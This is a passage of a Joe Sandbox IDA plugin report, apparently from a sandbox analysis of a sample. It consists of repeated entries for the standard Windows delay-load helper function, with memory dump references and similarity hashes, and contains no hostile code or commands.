                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 32e49c96d974aa5d041662c9638afc1f16621782f13bb11d1c53ea8c5d0c06df
                                                                                                                                                                                                                                                                            • Instruction ID: 04de7518901eb4c370c2b77b034d0793b55ac48bc200f3b36b918ec5bab16d5f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32e49c96d974aa5d041662c9638afc1f16621782f13bb11d1c53ea8c5d0c06df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6B012C735E1026E318451255C06E3A014CD0C8F14330E82FB018C0043D4890C440137
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C183
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 3bb3ea8fcd2c07e16f41f4284fe02ac39f0c36b23c5e3318b69a0da4213c7041
• Instruction ID: 6fe982677c622a5d597220a272e546cc2aa8cfcdd03553aa7ff0389d04d66f2c
• Opcode Fuzzy Hash: 3bb3ea8fcd2c07e16f41f4284fe02ac39f0c36b23c5e3318b69a0da4213c7041
• Instruction Fuzzy Hash: 1DB002D725F102BE315551555D57D3A125CC5C9B15331E95FB815D4042D5855C451037
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: baa563fed62707f62aeebb682b78da489a36bb1b74664df992bc82eebadf39f0
• Instruction ID: cb593d20059d88ce5b1493bce352a0eb94030b3ec090a903b5f65e4203531b75
• Opcode Fuzzy Hash: baa563fed62707f62aeebb682b78da489a36bb1b74664df992bc82eebadf39f0
• Instruction Fuzzy Hash: A6B012C735E102AE318451255C06D3A014CC0C8F10330E42FB408C0043D4890C440137
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 1b1cd4ec3d435085c32f7f1cc156d126af4165a791bb894c6a087755ebcb2a43
• Instruction ID: a615ea0dcf75ce5ed245d850968ffab39a23460c9deb8e52dd089ba71570398c
• Opcode Fuzzy Hash: 1b1cd4ec3d435085c32f7f1cc156d126af4165a791bb894c6a087755ebcb2a43
• Instruction Fuzzy Hash: 51B012C735F1066E318451255C07E3A014CD4C8F14330E81FB008C0043D4890C400137
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 52008badc5d6b60344a55a946f3d937c9db86953b955942002436edf34fc3ed1
• Instruction ID: 89f2856ef9480ab3d46a7b1c477d8b78ba052d024c21f0084a69a4605a2d82a8
• Opcode Fuzzy Hash: 52008badc5d6b60344a55a946f3d937c9db86953b955942002436edf34fc3ed1
• Instruction Fuzzy Hash: 7EB012C735E1026E318451255D06D3A014CC0C8F10330E42FB008C0043D48A0C450137
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 92475e62cd85d57e98e6f20011f46738ea8fc37dfbf2568778a8f651a4036c30
                                                                                                                                                                                                                                                                            • Instruction ID: 74bbfef841db41c3d2ec4002a5af12792ea9bfb0e93267fec2b6a029f1f80d74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92475e62cd85d57e98e6f20011f46738ea8fc37dfbf2568778a8f651a4036c30
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBB002D735E2026E329455655D06D3A055CC5C9F15331E56FB419C5143D48A5D891137
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 938a2d8c44724c62dec3024b349e4e099d9f351dc9d301976cdff0fb16b33524
                                                                                                                                                                                                                                                                            • Instruction ID: 19e4254b27ede2cd3f662d7f681f59080ab464c96bf8f792316c02365ef4a7fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 938a2d8c44724c62dec3024b349e4e099d9f351dc9d301976cdff0fb16b33524
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24B012C735F202AE318451155C06D3A015CC0C8F10330E41FB408C1043D4890C44013B
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c1a4a498d475d4af706ddc0b7eab7feacdf005add51d603c66397182949f05d6
                                                                                                                                                                                                                                                                            • Instruction ID: cdbf977c74b4e791ffea72ef924e232c445884723a449085b151e116f96f201f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a4a498d475d4af706ddc0b7eab7feacdf005add51d603c66397182949f05d6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75B012CB35E202AE328451155D06D3A014CC0C8F10330E51FF008C4083E4890C840137
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c28e5f44b24bb016b5f2b04a7c61a28d707f6dc7c4b81f669a721926a656e953
                                                                                                                                                                                                                                                                            • Instruction ID: 2e9a1062e467b64ae314ebe95cf3759a1c26817c9ce952f5c47aa59416288071
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c28e5f44b24bb016b5f2b04a7c61a28d707f6dc7c4b81f669a721926a656e953
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0B002DB35E102AE319451555E06D3A015CD5C9F15331E55FB519C5183F48A5D451137
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C343
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
  • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
  • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
